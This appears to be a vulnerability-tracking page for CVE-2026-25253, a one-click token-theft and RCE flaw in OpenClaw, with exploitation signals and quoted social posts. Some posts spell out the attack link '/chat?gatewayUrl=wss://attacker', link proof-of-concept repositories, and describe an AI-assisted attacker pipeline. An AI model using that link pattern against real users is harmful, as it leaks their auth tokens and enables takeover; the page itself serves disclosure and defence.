CVE-2026-25253Disclosure(openclaw / openclaw)

CRITICALCVSS 8.8 · HIGH

Exploitation observed; activity peaked at 23 mentions and remains active

Immediate actions

  • Patch openclaw openclaw systems immediately
  • Assume compromise if assets are exposed
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft

Recommended action window: Immediate (within 24h)

NVD description

OpenClaw (aka clawdbot or Moltbot) before 2026.1.29 obtains a gatewayUrl value from a query string and automatically makes a WebSocket connection without prompting, sending a token value.

9.0/ 10 priority

Sources & remediation

Other references
Weakness type (CWE)
CWE-669

Priority

CRITICAL

Exploitation

ACTIVE

PoC

YES

Patch

AVAILABLE

Momentum

DECLINING

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • openclaw

Threat summary

  • Active exploitation appears in 79 classified signals
  • Public PoC and exploit tooling are both present
  • Patch or workaround signal is available
  • 438 mentions across 95 observed days

What's happening

  • Active exploitation reported across 79 signals
  • Exploit tool or code specified in 10 signals
  • PoC mentioned or linked in 29 signals
  • Patch or workaround mentioned in 126 signals
  • Technical details provided in 277 signals
  • Disclosure: 135 classified signals
  • General: 125 classified signals
  • Peaked 92d ago at 23 mentions (2026-02-03); latest day: 1
  • 438 total mentions across 95 days

Affected systems

Vendors
Products
openclaw

Deep dive

Activity timeline438 mentions / 95d
06121723Mentions · 2026-02-01: 3Mentions · 2026-02-02: 17Mentions · 2026-02-03: 23Mentions · 2026-02-04: 22Mentions · 2026-02-05: 5Mentions · 2026-02-06: 4Mentions · 2026-02-07: 6Mentions · 2026-02-08: 5Mentions · 2026-02-09: 11Mentions · 2026-02-10: 10Mentions · 2026-02-12: 16Mentions · 2026-02-13: 7Mentions · 2026-02-14: 14Mentions · 2026-02-15: 15Mentions · 2026-02-16: 11Mentions · 2026-02-17: 4Mentions · 2026-02-18: 8Mentions · 2026-02-19: 5Mentions · 2026-02-20: 3Mentions · 2026-02-22: 2Mentions · 2026-02-23: 6Mentions · 2026-02-24: 6Mentions · 2026-02-25: 2Mentions · 2026-02-26: 5Mentions · 2026-02-27: 12Mentions · 2026-02-28: 3Mentions · 2026-03-01: 1Mentions · 2026-03-02: 18Mentions · 2026-03-03: 11Mentions · 2026-03-04: 9Mentions · 2026-03-05: 8Mentions · 2026-03-06: 3Mentions · 2026-03-07: 2Mentions · 2026-03-08: 4Mentions · 2026-03-09: 11Mentions · 2026-03-10: 3Mentions · 2026-03-11: 3Mentions · 2026-03-12: 3Mentions · 2026-03-14: 4Mentions · 2026-03-15: 5Mentions · 2026-03-16: 6Mentions · 2026-03-17: 6Mentions · 2026-03-18: 5Mentions · 2026-03-19: 2Mentions · 2026-03-20: 6Mentions · 2026-03-21: 13Mentions · 2026-03-22: 2Mentions · 2026-03-23: 12Mentions · 2026-03-24: 3Mentions · 2026-03-25: 3Mentions · 2026-03-26: 4Mentions · 2026-03-27: 3Mentions · 2026-03-28: 3Mentions · 2026-03-29: 5Mentions · 2026-03-30: 4Mentions · 2026-03-31: 3Mentions · 2026-04-03: 2Mentions · 2026-04-05: 2Mentions · 2026-04-06: 3Mentions · 2026-04-10: 2Mentions · 2026-04-12: 1Mentions · 2026-04-13: 1Mentions · 2026-04-14: 2Mentions · 2026-04-15: 1Mentions · 2026-04-18: 1Mentions · 2026-04-19: 1Mentions · 2026-04-20: 1Mentions · 2026-04-21: 1Mentions · 2026-04-22: 1Mentions · 2026-04-23: 1Mentions · 2026-04-25: 2Mentions · 2026-04-26: 1Mentions · 2026-04-28: 1Mentions · 2026-05-04: 1Mentions · 2026-05-06: 2Mentions · 2026-05-11: 1Mentions · 2026-05-13: 1Mentions · 2026-05-15: 1Mentions · 2026-05-20: 1Mentions · 2026-06-03: 1Mentions · 2026-06-08: 1Mentions · 2026-06-10: 1Mentions · 2026-06-11: 1Mentions · 2026-06-16: 1Mentions · 2026-06-18: 2Mentions · 2026-06-24: 1Mentions · 2026-06-26: 1Mentions · 2026-07-04: 1Mentions · 2026-07-13: 1Mentions · 2026-07-31: 1Mentions · 2026-08-21: 1Mentions · 2026-08-30: 1Mentions · 2026-09-01: 1Mentions · 2026-09-02: 1Mentions · 2026-09-04: 1PoC Mentioned / Linked · 2026-02-02: 1PoC Mentioned / Linked · 2026-02-03: 3PoC Mentioned / Linked · 2026-02-04: 2PoC Mentioned / Linked · 2026-02-05: 1PoC Mentioned / Linked · 2026-02-16: 1PoC Mentioned / Linked · 2026-02-18: 1PoC Mentioned / Linked · 2026-02-27: 1PoC Mentioned / Linked · 2026-03-02: 2PoC Mentioned / Linked · 2026-03-03: 5PoC Mentioned / Linked · 2026-03-04: 2PoC Mentioned / Linked · 2026-03-17: 1PoC Mentioned / Linked · 2026-03-19: 1PoC Mentioned / Linked · 2026-03-23: 1PoC Mentioned / Linked · 2026-03-24: 1PoC Mentioned / Linked · 2026-03-28: 1PoC Mentioned / Linked · 2026-03-29: 1PoC Mentioned / Linked · 2026-03-31: 1PoC Mentioned / Linked · 2026-04-25: 1PoC Mentioned / Linked · 2026-05-06: 1PoC Mentioned / Linked · 2026-05-11: 1Exploit Tool / Code · 2026-02-03: 1Exploit Tool / Code · 2026-02-04: 1Exploit Tool / Code · 2026-02-12: 1Exploit Tool / Code · 2026-02-16: 2Exploit Tool / Code · 2026-02-27: 1Exploit Tool / Code · 2026-03-17: 1Exploit Tool / Code · 2026-03-24: 1Exploit Tool / Code · 2026-03-31: 1Exploit Tool / Code · 2026-05-06: 1Active Exploitation · 2026-02-03: 2Active Exploitation · 2026-02-04: 2Active Exploitation · 2026-02-05: 1Active Exploitation · 2026-02-07: 2Active Exploitation · 2026-02-08: 1Active Exploitation · 2026-02-09: 2Active Exploitation · 2026-02-10: 2Active Exploitation · 2026-02-12: 4Active Exploitation · 2026-02-13: 1Active Exploitation · 2026-02-14: 2Active Exploitation · 2026-02-15: 3Active Exploitation · 2026-02-18: 4Active Exploitation · 2026-02-19: 3Active Exploitation · 2026-02-20: 1Active Exploitation · 2026-02-22: 1Active Exploitation · 2026-02-23: 2Active Exploitation · 2026-02-24: 1Active Exploitation · 2026-02-26: 3Active Exploitation · 2026-02-27: 2Active Exploitation · 2026-02-28: 1Active Exploitation · 2026-03-02: 2Active Exploitation · 2026-03-03: 2Active Exploitation · 2026-03-04: 1Active Exploitation · 2026-03-05: 2Active Exploitation · 2026-03-07: 1Active Exploitation · 2026-03-09: 1Active Exploitation · 2026-03-10: 2Active Exploitation · 2026-03-11: 1Active Exploitation · 2026-03-14: 1Active Exploitation · 2026-03-15: 2Active Exploitation · 2026-03-16: 1Active Exploitation · 2026-03-18: 2Active Exploitation · 2026-03-20: 1Active Exploitation · 2026-03-21: 2Active Exploitation · 2026-03-23: 1Active Exploitation · 2026-03-24: 1Active Exploitation · 2026-03-25: 1Active Exploitation · 2026-03-26: 1Active Exploitation · 2026-03-27: 2Active Exploitation · 2026-03-29: 1Active Exploitation · 2026-03-30: 1Active Exploitation · 2026-04-06: 1Active Exploitation · 2026-04-15: 1Active Exploitation · 2026-04-21: 1Active Exploitation · 2026-04-26: 1Active Exploitation · 2026-05-11: 1Active Exploitation · 2026-05-13: 1Active Exploitation · 2026-06-08: 1Active Exploitation · 2026-06-10: 1Active Exploitation · 2026-06-26: 1Active Exploitation · 2026-07-31: 1Patch / Workaround · 2026-02-02: 7Patch / Workaround · 2026-02-03: 8Patch / Workaround · 2026-02-04: 5Patch / Workaround · 2026-02-05: 1Patch / Workaround · 2026-02-06: 1Patch / Workaround · 2026-02-07: 2Patch / Workaround · 2026-02-08: 3Patch / Workaround · 2026-02-09: 4Patch / Workaround · 2026-02-10: 4Patch / Workaround · 2026-02-12: 4Patch / Workaround · 2026-02-13: 1Patch / Workaround · 2026-02-14: 5Patch / Workaround · 2026-02-15: 4Patch / Workaround · 2026-02-16: 4Patch / Workaround · 2026-02-17: 1Patch / Workaround · 2026-02-18: 2Patch / Workaround · 2026-02-19: 1Patch / Workaround · 2026-02-24: 1Patch / Workaround · 2026-02-26: 2Patch / Workaround · 2026-02-27: 5Patch / Workaround · 2026-02-28: 1Patch / Workaround · 2026-03-01: 1Patch / Workaround · 2026-03-02: 7Patch / Workaround · 2026-03-03: 5Patch / Workaround · 2026-03-04: 5Patch / Workaround · 2026-03-05: 2Patch / Workaround · 2026-03-06: 1Patch / Workaround · 2026-03-07: 1Patch / Workaround · 2026-03-08: 1Patch / Workaround · 2026-03-09: 1Patch / Workaround · 2026-03-10: 1Patch / Workaround · 2026-03-11: 3Patch / Workaround · 2026-03-14: 2Patch / Workaround · 2026-03-15: 3Patch / Workaround · 2026-03-16: 1Patch / Workaround · 2026-03-18: 1Patch / Workaround · 2026-03-19: 1Patch / Workaround · 2026-03-20: 3Patch / Workaround · 2026-03-21: 1Patch / Workaround · 2026-03-23: 4Patch / Workaround · 2026-03-24: 1Patch / Workaround · 2026-03-26: 1Patch / Workaround · 2026-03-29: 4Patch / Workaround · 2026-04-03: 1Patch / Workaround · 2026-04-05: 1Patch / Workaround · 2026-04-14: 2Patch / Workaround · 2026-04-21: 1Patch / Workaround · 2026-05-04: 1Patch / Workaround · 2026-05-20: 1Patch / Workaround · 2026-06-26: 1Patch / Workaround · 2026-08-21: 1Patch / Workaround · 2026-09-02: 1Technical Details · 2026-02-01: 3Technical Details · 2026-02-02: 10Technical Details · 2026-02-03: 18Technical Details · 2026-02-04: 15Technical Details · 2026-02-05: 4Technical Details · 2026-02-06: 2Technical Details · 2026-02-07: 4Technical Details · 2026-02-08: 5Technical Details · 2026-02-09: 6Technical Details · 2026-02-10: 5Technical Details · 2026-02-12: 6Technical Details · 2026-02-13: 4Technical Details · 2026-02-14: 12Technical Details · 2026-02-15: 9Technical Details · 2026-02-16: 5Technical Details · 2026-02-17: 2Technical Details · 2026-02-18: 2Technical Details · 2026-02-19: 4Technical Details · 2026-02-20: 1Technical Details · 2026-02-22: 1Technical Details · 2026-02-23: 5Technical Details · 2026-02-24: 2Technical Details · 2026-02-25: 1Technical Details · 2026-02-26: 4Technical Details · 2026-02-27: 8Technical Details · 2026-02-28: 3Technical Details · 2026-03-01: 1Technical Details · 2026-03-02: 10Technical Details · 2026-03-03: 10Technical Details · 2026-03-04: 5Technical Details · 2026-03-05: 5Technical Details · 2026-03-06: 2Technical Details · 2026-03-07: 2Technical Details · 2026-03-08: 2Technical Details · 2026-03-09: 6Technical Details · 2026-03-10: 2Technical Details · 2026-03-11: 3Technical Details · 2026-03-12: 1Technical Details · 2026-03-14: 3Technical Details · 2026-03-15: 2Technical Details · 2026-03-16: 3Technical Details · 2026-03-17: 6Technical Details · 2026-03-18: 4Technical Details · 2026-03-19: 1Technical Details · 2026-03-20: 4Technical Details · 2026-03-21: 9Technical Details · 2026-03-22: 1Technical Details · 2026-03-23: 7Technical Details · 2026-03-24: 2Technical Details · 2026-03-25: 1Technical Details · 2026-03-26: 3Technical Details · 2026-03-27: 1Technical Details · 2026-03-29: 3Technical Details · 2026-03-30: 3Technical Details · 2026-04-03: 2Technical Details · 2026-04-05: 2Technical Details · 2026-04-06: 3Technical Details · 2026-04-10: 2Technical Details · 2026-04-14: 1Technical Details · 2026-04-15: 1Technical Details · 2026-04-19: 1Technical Details · 2026-04-21: 1Technical Details · 2026-04-22: 1Technical Details · 2026-05-06: 2Technical Details · 2026-05-11: 1Technical Details · 2026-05-13: 1Technical Details · 2026-05-15: 1Technical Details · 2026-05-20: 1Technical Details · 2026-06-08: 1Technical Details · 2026-06-10: 1Technical Details · 2026-06-11: 1Technical Details · 2026-06-16: 1Technical Details · 2026-06-18: 2Technical Details · 2026-06-24: 1Technical Details · 2026-06-26: 1Technical Details · 2026-07-04: 1Technical Details · 2026-07-31: 1Technical Details · 2026-08-21: 1Technical Details · 2026-08-30: 1Technical Details · 2026-09-01: 1Technical Details · 2026-09-04: 102-0102-1002-2003-0203-1103-2103-3004-1504-2806-1008-2109-04
Signal classification6 categories
Disclosure
13530.8%
General
12528.5%
Patch
9321.2%
Active Exploitation
6314.4%
PoC
143.2%
Exploit
81.8%
Referenced assets188 URLs
By indicator
Classification over time
DateTotalLabels
2026-02-013
Disclosure3
2026-02-0217
Disclosure6General6Patch5
2026-02-0323
Active Exploitation2Disclosure8General4Patch7PoC2
2026-02-0422
Active Exploitation2Disclosure7Exploit1General6Patch5PoC1
2026-02-055
Active Exploitation1Disclosure1General2Patch1
2026-02-064
Disclosure1General2Patch1
2026-02-076
Active Exploitation2Disclosure3Patch1
2026-02-085
Disclosure3Patch2
2026-02-0911
Active Exploitation1Disclosure3General5Patch2
2026-02-1010
Active Exploitation2General5Patch3
2026-02-1216
Active Exploitation4Disclosure7General3Patch2
2026-02-137
Active Exploitation1Disclosure3General2Patch1
2026-02-1414
Active Exploitation2Disclosure1General6Patch5
2026-02-1515
Active Exploitation3Disclosure4General5Patch3
2026-02-1611
Disclosure2Exploit1General4Patch4
2026-02-174
Disclosure1General2Patch1
2026-02-188
Active Exploitation3Exploit1General2Patch2
2026-02-195
Active Exploitation2Disclosure3
2026-02-203
Active Exploitation1General2
2026-02-222
Active Exploitation1General1
2026-02-236
Active Exploitation2Disclosure3General1
2026-02-246
Active Exploitation1Disclosure2General3
2026-02-252
Disclosure1General1
2026-02-265
Active Exploitation3Disclosure1General1
2026-02-2712
Active Exploitation2Disclosure1Exploit1General3Patch5
2026-02-283
Active Exploitation1Disclosure1Patch1
2026-03-011
Patch1
2026-03-0218
Active Exploitation1Disclosure10General2Patch4PoC1
2026-03-0311
Active Exploitation2Disclosure4Patch2PoC3
2026-03-049
Active Exploitation1Disclosure2General2Patch3PoC1
2026-03-058
Active Exploitation2General4Patch2
2026-03-063
Disclosure1General1Patch1
2026-03-072
Exploit1Patch1
2026-03-084
Disclosure1General2Patch1
2026-03-0911
Active Exploitation1Disclosure5General5
2026-03-103
Active Exploitation2General1
2026-03-113
Exploit1Patch2
2026-03-123
Disclosure1General2
2026-03-144
Disclosure2General1Patch1
2026-03-155
Exploit1General2Patch2
2026-03-166
Disclosure3General3
2026-03-176
Disclosure5PoC1
2026-03-185
Active Exploitation2Disclosure3
2026-03-192
General1Patch1
2026-03-206
Active Exploitation1Disclosure1General2Patch2
2026-03-2113
Active Exploitation2Disclosure5General5Patch1
2026-03-222
Disclosure1General1
2026-03-2312
Active Exploitation1Disclosure2General5Patch4
2026-03-243
Disclosure2General1
2026-03-253
Active Exploitation1Disclosure1General1
2026-03-264
Active Exploitation1Disclosure2General1
2026-03-273
Active Exploitation2General1
2026-03-283
General1Patch1PoC1
2026-03-295
Active Exploitation1Patch3PoC1
2026-03-304
Active Exploitation1Disclosure3
2026-03-313
General2PoC1
2026-04-032
General1Patch1
2026-04-052
Disclosure1Patch1
2026-04-063
Active Exploitation1Disclosure2
2026-04-102
Disclosure2
2026-04-121
General1
2026-04-131
General1
2026-04-142
Patch2
2026-04-151
Active Exploitation1
2026-04-181
General1
2026-04-191
Disclosure1
2026-04-201
Disclosure1
2026-04-211
Patch1
2026-04-221
Disclosure1
2026-04-231
General1
2026-04-252
General1PoC1
2026-04-261
Active Exploitation1
2026-04-281
General1
2026-05-041
Patch1
2026-05-062
General1PoC1
2026-05-111
Exploit1
2026-05-131
General1
2026-05-151
Disclosure1
2026-05-201
Patch1
2026-06-031
General1
2026-06-081
Active Exploitation1
2026-06-101
Active Exploitation1
2026-06-111
Disclosure1
2026-06-161
Disclosure1
2026-06-182
Disclosure2
2026-06-241
General1
2026-06-261
Patch1
2026-07-041
Disclosure1
2026-07-131
General1
2026-07-311
Active Exploitation1
2026-08-211
Patch1
2026-08-301
Disclosure1
2026-09-011
General1
2026-09-021
Patch1
2026-09-041
Disclosure1
Full discourse20 posts
  • André Baptista@0xacb
    PoC

    🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 https://ethiack.com/news/blog/one-click-rce-moltbot

    Post summary

    The post announces a remote code execution flaw (CVE‑2026‑25253) in Clawdbot, shares a proof‑of‑concept via a one‑click link that exploits a WebSocket token leak, but does not provide exploit code, mention active exploitation, or a patch.

    2415822678484119.6K
    18.7K followersView on X
  • OccupytheWeb@three_cube
    Disclosure

    OpenClaw Vulnerability! CVE-2026-25253 enables attackers to steal authentication tokens of OpenClaw AI Systems! https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/ https://t.co/Rey23qKAOZ

    Post summary

    The post announces CVE‑2026‑25253 as a flaw that lets attackers steal authentication tokens from OpenClaw AI Systems, but it does not provide PoC, exploit code, or remediation details.

    1463428113820.2K
    257.7K followersView on X
  • Sans Limite@SansLimit3
    Exploit

    Exposed attacker infrastructure combining #Hermes Agent, #CyberStrikeAI, #SliverC2, and multiple LLMs used for automated CVE targeting, exploit validation, Telegram-based orchestration, and post-exploitation validation workflows. Opendir: 142.171.160[.]137:8888 VULN-MONITOR: 142.171.149[.169:8001 - Real-time 1day/0day RCE tracking across 18 sources🤔 CyberStrikeAI Server: 100.81.245[.29:8080 Chain: FOFA/Shodan recon → AI-assisted target filtering → CVE/PoC enrichment → custom scanner & exploit generation → exploit validation → WebSocket/shell access → post-exploitation environment validation → Telegram-pushed operations. Targeted CVEs: CVE-2026-0300 (Palo Alto PAN-OS) CVE-2024-21762 (FortiOS/FortiProxy SSL-VPN) CVE-2026-33017 (Langflow) CVE-2026-21858 (n8n) CVE-2026-3055 (Citrix ADC/NetScaler) CVE-2026-34486 (Apache Tomcat) CVE-2026-25253 (OpenClaw/Moltbot/Clawdbot) @malwrhunterteam @500mk500 @1ZRR4H @MichalKoczwara

    Post summary

    The post outlines an attacker pipeline that automates CVE detection, PoC enrichment, and exploit validation, indicating active exploitation of multiple zero‑day and day‑one vulnerabilities.

    837223619525.2K
    634 followersView on X
  • OccupytheWeb@three_cube
    Disclosure

    OpenClaw Vulnerability! CVE-2026-25253 enables attackers to steal authentication tokens of OpenClaw AI Systems! https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/ https://t.co/szETjPTd6C

    Post summary

    CVE-2026-25253 reportedly allows attackers to steal authentication tokens from OpenClaw AI Systems, but no details on exploitation tools, active attacks, or patches are provided.

    1322278364.5K
    256.8K followersView on X
  • Fadi Al-Aswadi@f_aswadi
    Disclosure

    ثغرة جديدة في openclaw ليست الاولى ولن تكون الاخيرة، والسبب التطوير باستخدام vibe coding والسبب جنون الإنتاجية البرمجية.. اسم الثغرة CVE-2026-25253 درجة الخطورة حرجة - critical وصفها one click Remote Code Execution يعني اختراق بضغطة واحده https://t.co/zNz2EXiefk

    Post summary

    A new critical vulnerability (CVE-2026-25253) in OpenClaw allows remote code execution with a single click, with no mention of PoC, exploit, active attacks, or patches.

    7100813816.1K
    70.3K followersView on X
  • Hunter@HunterMapping
    PoC

    🚨Alert🚨 CVE-2026-25253 : OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link 🔥PoC :https://github.com/ethiack/moltbot-1click-rce 🧐Deep Dive :https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys 📊 16.7K Services are found on the http://hunter.how yearly. 🔗Hunter Link:https://hunter.how/list?searchValue=product.name%3D%22Clawdbot%22 👇Query HUNTER : http://product.name="Clawdbot" 📰Refer:https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq https://thehackernews.com/2026/02/openclaw-bug-enables-one-click-remote.html #hunterhow #infosec #infosecurity #OSINT #Vulnerability

    Post summary

    CVE-2026-25253 enables one‑click remote code execution in OpenClaw, with a PoC link and technical details disclosed, but no evidence of active exploitation or a published patch.

    321072346.5K
    25.4K followersView on X
  • Muqsit 𝕏@mqst_
    Disclosure

    1-Click RCE To Steal Your OpenClaw Data and Keys (CVE-2026-25253) Blog: https://depthfirst.com/research/1-click-rce-to-steal-your-moltbot-data-and-keys Author: Mav Levin https://t.co/B6ytcng3cE

    Post summary

    The text announces a new CVE (CVE-2026-25253) that allows a one-click remote code execution to steal data and keys, but provides no PoC, exploit code, patch, or detailed technical specifics.

    010072313.8K
    13.3K followersView on X
  • Itamar Golan 🤓@ItakGol
    Disclosure

    🚨One-click RCE in OpenClaw If you use Clawdbot/Moltbot, an attacker may be able to achieve remote code execution on your machine by simply tricking you into opening a link. The wild part: this bug (CVE-2026-25253) was found in about 100 minutes, fully autonomously, using Ethiack’s AI pentesting tool, Hackian. Attack Flow 👇 1. The Control UI keeps the gateway auth token in localStorage and, on page load, builds the first WebSocket connection frame from it. 2. The UI also accepts a gatewayUrl query parameter, for example: /chat?gatewayUrl=wss://attacker. 3. That parameter overrides the saved gateway and auto-connects. 4. On initial load, the UI opens a WebSocket to the attacker-controlled endpoint and sends the token. Link for the full research blog in the comments 🔗

    Post summary

    CVE‑2026‑25253 allows one‑click remote code execution in OpenClaw via a gatewayUrl parameter, discovered autonomously by an AI pentesting tool. Technical details are provided, but no PoC, exploit, active exploitation, or patch is mentioned.

    134135285.8K
    20.7K followersView on X
  • yousukezan@yousukezan
    General

    OpenClawの凄さと危険性を徹底解説 — CVE-2026-25253・ClawHavoc攻撃から学ぶAIエージェントのセキュリティ https://qiita.com/KM-Eye/items/d2fd3e99f5a1f34d560e #Qiita @Mjinia_ganbarowより

    Post summary

    The tweet links to a Qiita article discussing OpenClaw and CVE‑2026‑25253 but does not provide any specific technical or exploit details.

    07033302.2K
    11.3K followersView on X
  • ثامر الغالي@alghali
    Disclosure

    🚨 تحذير أمني: ثغرات خطيرة في OpenClaw! كشف تقرير جديد عن وجود ثغرات أمنية حرجة في وكيل الذكاء الاصطناعي الشهير OpenClaw، تفتح الباب أمام المهاجمين للسيطرة الكاملة على الأجهزة. أبرز المخاطر: 🔓 ثغرة CVE-2026-25253: تسمح بسرقة رموز المصادقة (Tokens) وتنفيذ الأوامر عن بُعد (RCE) بمجرد نقرة واحدة. 📦 تسمم الإضافات: اكتشاف برمجيات خبيثة في 12% من متجر "ClawHub" تتضمن أدوات تسجيل ضربات المفاتيح وسرقة البيانات. 🌐 انكشاف واسع: أكثر من 135 ألف نسخة من OpenClaw مكشوفة علنًا على الإنترنت بإعدادات افتراضية غير آمنة. 💡 نصيحة: إذا كنت تستخدم الأداة، سارع بالتحديث إلى نسخة 2026.2.26 أو أحدث، وتجنب تشغيلها بصلاحيات "جذر" (Root) أو ربطها مباشرة بالإنترنت العام.

    Post summary

    The post announces a new, critical RCE vulnerability (CVE‑2026‑25253) in OpenClaw and urges users to update to version 2026.2.26 or newer to mitigate the risk.

    22134287.6K
    86.3K followersView on X
  • André Baptista@0xacb
    Disclosure

    💥 One click could completely compromise a @OpenClaw / Moltbot / Clawdbot (CVE-2026-25253) The vulnerability is now fixed, but here's how it worked: - gatewayUrl Parameter: A GET parameter automatically overrides the WebSocket gateway URL used by the Control UI - Token Exfiltration: Visiting a malicious link leaks the victim's auth token to the attacker's server - WebSocket CORS Bypass: No origin validation means attackers can reach localhost through the victim's browser - Instant RCE: Stolen token = full system access via arbitrary commands.

    Post summary

    The tweet announces CVE-2026-25253, explains how it exploits a gatewayUrl override to exfiltrate tokens and achieve remote code execution, and notes the issue has been fixed.

    48036113.5K
    18.7K followersView on X
  • Vadim@zacodil
    Active Exploitation

    Nobody wants to hear this, but the personal AI agent space has been shipping autonomy-first, security-never for months OpenClaw hit 200K stars while storing API keys and OAuth tokens as plaintext markdown files. Then CVE-2026-25253 dropped - 1-click RCE, 42K+ exposed instances, 1.5M leaked tokens. Andrej Karpathy himself said don't run it The "not letting the LLM touch secrets at all" design in IronClaw isn't some premium feature. It should've been the baseline from day one. WASM sandboxing per tool, credential injection only at network boundaries, leak detection on outbound traffic - this is what responsible agent infra looks like And confidential hosting on NEAR AI Cloud with TEEs closes the last gap. Running agents locally was never really "secure" when your browser could pivot into localhost anyway. Hardware-enforced isolation with cryptographic attestation is the actual answer Timing on this couldn't be better

    Post summary

    CVE-2026-25253 has been actively exploited, exposing over 42,000 instances and 1.5 million tokens, with no patch or PoC referenced in the text.

    3203741.4K
    10.4K followersView on X
  • zaimiri ✏️@zaimiri
    Patch

    To clarify OpenClaw patched it fast (update to v2026.2.25+). CVE-2026-25253 Make sure to update your OpenClaw

    Post summary

    OpenClaw has released a patch (v2026.2.25+) for CVE-2026-25253; users are advised to update.

    1203165.6K
    55.6K followersView on X
  • FOFA@fofabot
    Disclosure

    ⚠️⚠️ CVE-2026-25253: New 1-click RCE in OpenClaw allows attackers to steal auth tokens and hijack local gateways via Cross-Site WebSocket Hijacking. 🔗FOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJPcGVuQ2xhdyI%3D 🎯22k+ Results are found on the https://en.fofa.info nearly year. FOFA Query: app="OpenClaw" 🔖Refer: https://thehackernews.com/2026/02/openclaw-bug-enables-one-click-remote.html #OSINT #FOFA #CyberSecurity #Vulnerability

    Post summary

    The post announces CVE‑2026‑25253, a 1‑click remote code execution flaw in OpenClaw that enables token theft and WebSocket hijacking, but it does not provide a PoC, exploit code, patch, or evidence of active exploitation.

    13026102.3K
    13.6K followersView on X
  • Grok@grok
    Patch

    OpenClaw earned its bad rep in Jan-Feb 2026 from rapid launch flaws: CVE-2026-25253 (one-click RCE via malicious site), 500+ vulns in audits, thousands of exposed unauth instances leaking keys, and ~12% malicious ClawHub skills installing malware. Led to warnings, China gov bans. Most fixed fast with patches. Today's v2026.3.13 + NVIDIA engineer triage on advisories shows strong progress—ongoing hardening, sandboxing, DM pairing, built-in security audit. Current state: Solid if you run latest, use `openclaw doctor`/`onboard`, enable sandbox/loopback bind per docs. Viable for general population with basic caution (isolate if possible, vet skills). Inherent agent risks remain, but way safer now. 🦞

    Post summary

    OpenClaw’s CVE-2026-25253, a one-click RCE that caused widespread exposure, was quickly patched; the latest release and sandboxing measures make it safe when kept up‑to‑date.

    11018161.3K
    8.5M followersView on X
  • Mr. OS@ksg93rd
    Exploit

    #exploit 1⃣. CVE-2026-2441: https://github.com/huseyinstif/CVE-2026-2441-PoC Google Chrome Blink RCE 2⃣. CVE-2026-27896: https://dev.to/cverports/cve-2026-27896-case-insensitive-chaos-bypassing-security-controls-in-mcp-go-sdk-jag Bypassing Security Controls in MCP Go SDK 3⃣. CVE-2026-20841: https://github.com/tangent65536/CVE-2026-20841 Windows Notepad RCE 4⃣. CVE-2026-20817: https://github.com/oxfemale/CVE-2026-20817 Windows Error Reporting ALPC Privilege Escalation 5⃣. CVE-2026-25253: https://github.com/ethiack/moltbot-1click-rce Clawdbot/Moltbot/OpenClaw One-click RCE

    Post summary

    The tweet lists five CVEs, each accompanied by a GitHub link to a PoC/exploit and a brief vulnerability type, but does not mention patches or active exploitation.

    0202014708
    3.1K followersView on X
  • Hunt.io@Huntio
    Disclosure

    🚨 CVE-2026-25253: Tracking 17,500 Exposed OpenClaw Instances on the Public Internet Our research team recently analyzed internet-exposed browser automation frameworks affected by #CVE202625253, including #OpenClaw, #Clawdbot, and #Moltbot. What we found points to a broad and measurable exposure pattern. Key observations from the analysis: - More than 17,500 exposed instances vulnerable to CVE-2026-25253 were identified. - The /api/export-auth endpoint allows unauthenticated access to stored API tokens. - Clawdbot Control represents 68.9% of observed deployments, followed by Moltbot (22.3%) and OpenClaw (8.8%). - Exposures span 52 countries, with the highest concentration in the United States and China. - 98.6% of instances are hosted on cloud or hosting infrastructure, led by DigitalOcean, Alibaba Cloud, and Tencent. The full write-up breaks down how these instances were identified at scale, including the infrastructure patterns we observed and the detection techniques used throughout the investigation. 👉 Read the full analysis here: https://hunt.io/blog/cve-2026-25253-openclaw-ai-agent-exposure

    Post summary

    The analysis reveals that CVE-2026-25253 enables unauthenticated token access, exposing over 17,500 instances globally, yet it does not discuss exploitation, patches, or a PoC.

    3512331.7K
    4.8K followersView on X
  • Praxis@Praxis_Protocol
    General

    After this month's agent security disasters: - 1-click RCE (CVE-2026-25253) - 824+ malicious ClawHub skills - Meta AI Director's inbox deleted - $250K Lobstar Wilde blunder - 40K+ exposed instances What's the #1 priority for agent infrastructure? Identity (on-chain, unforgeable) Validation (verify skills before install) Reputation (score agent trustworthiness) Decentralization (no central DB to breach)

    Post summary

    The tweet lists CVE-2026-25253 among other agent security incidents but provides no further details or actionable information.

    670210492
    2.2K followersView on X
  • Coyote Security Scanner@CoyoteSecure
    General

    Trending on X now. Scan OpenClaw with Coyote 🐺 This week we added support for one of the newest vulnerabilities, CVE-2026-25253. Continuing to monitor and adds scans for new vulnerabilities in OpenClaw as they are reported. https://t.co/D3QzSZbnUV

    Post summary

    The tweet announces that CVE-2026-25253 is now supported in their scanning tool but provides no additional technical details or exploitation information.

    191182999
    220 followersView on X
  • ZoomEye@zoomeye_team
    Exploit

